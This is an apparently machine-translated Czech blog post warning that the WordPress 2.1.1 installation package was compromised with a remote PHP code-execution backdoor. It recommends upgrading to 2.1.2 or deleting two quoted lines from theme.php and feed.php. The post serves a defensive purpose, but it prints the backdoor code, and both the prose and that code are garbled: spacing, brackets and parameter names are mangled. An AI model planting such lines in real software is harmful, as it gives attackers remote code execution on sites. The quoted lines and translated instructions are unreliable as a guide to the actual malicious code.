Wordpress 2.1.1 je nebezpečné!
Zde je návod, jak se tým Wordpress definuje aktuální verzi WP. Důvod je prostý: před pár dny jeden cracker porušil některé ze serveru worpress.org, řízení změny instalačního balíčku, který je obvykle staženo: Zdá se, že se změny týkají pouze několik souborů umožňuje vzdálené spuštění z php kód. Chcete-li vyřešit tento problém, existují dvě alternativy:
- 1. Stáhnout verzi 2.1.2 ihned vydané vývojáři Wordpress a upgrade.
2. Odebrat ručně škodlivý kód (je-li jako já nechcete / čas nainstalovat novou verzi).
Je to jednoduše:
- Identifikovat a odstranit soubor "wp-includes/theme.php" následující řádek kódu:
if ($ _GET [ "z"]) (get_theme_mcommand ($ _GET [ "iz "]);) - Identifikovat a odstranit soubor "wp-includes/feed.php" následující řádek kódu:
if ($ _GET [ 'ix']) (comment_text_phpfilter ($ _GET [ 'ix']);) Stále žádný komentář '
Komentáře RSS kanál pro tento post. TrackBack URI
Zanechat komentář
Nothing2Hide © 2006 Všechna práva vyhrazena.
Licenční | Prohlášení
Zavřít
- Sociální Web
- Poslat e-mailem











































